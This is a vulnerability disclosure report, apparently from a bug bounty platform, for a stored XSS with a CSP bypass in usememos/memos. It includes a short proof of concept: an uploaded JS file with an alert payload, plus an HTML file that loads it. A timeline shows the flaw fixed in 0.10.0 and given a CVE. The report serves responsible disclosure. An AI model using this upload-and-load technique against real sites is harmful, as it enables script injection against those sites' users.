Stored XSS with CSP bypass through JS file upload in usememos/memos

Valid

Reported on

Dec 26th 2022

Description

I've seen here: https://github.com/usememos/memos/blob/main/server/resource.go#L268 that has been implemented the CSP with "default-src 'self'" configuration. This configuration can be bypassed if I'm able to upload a js file, and then call it from another files while they both resides on the server

Proof of Concept

  • Upload the first file on the resources: test.js
alert(document.domain);
  • Now get the link of this uploaded file, which for me is: http://localhost:5230/o/r/12/test.js
  • Now upload a html file, pointing on that url, made like this:
<!DOCTYPE html>

<html>
<head>
  <meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
  <title>Test</title>
</head>
<script src="http://localhost:5230/o/r/12/test.js"></script>
<body>
</body>
</html>
  • Now get the link to this html file: which for me is http://localhost:5230/o/r/14/test.html
  • Open the file in the browser, and that's the result:

image

Impact

It is possible to obtain a stored XSS bypassing the CSP currently implemented.

We are processing your report and will contact the usememos/memos team within 24 hours. 14 days ago
We have contacted a member of the usememos/memos team and are waiting to hear back 13 days ago
STEVEN validated this vulnerability 13 days ago
leorac has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
STEVEN marked this as fixed in 0.10.0 with commit 46c13a 3 days ago
STEVEN has been awarded the fix bounty
This vulnerability has been assigned a CVE
STEVEN published this vulnerability 3 days ago
resource.go#L268 has been validated
to join this conversation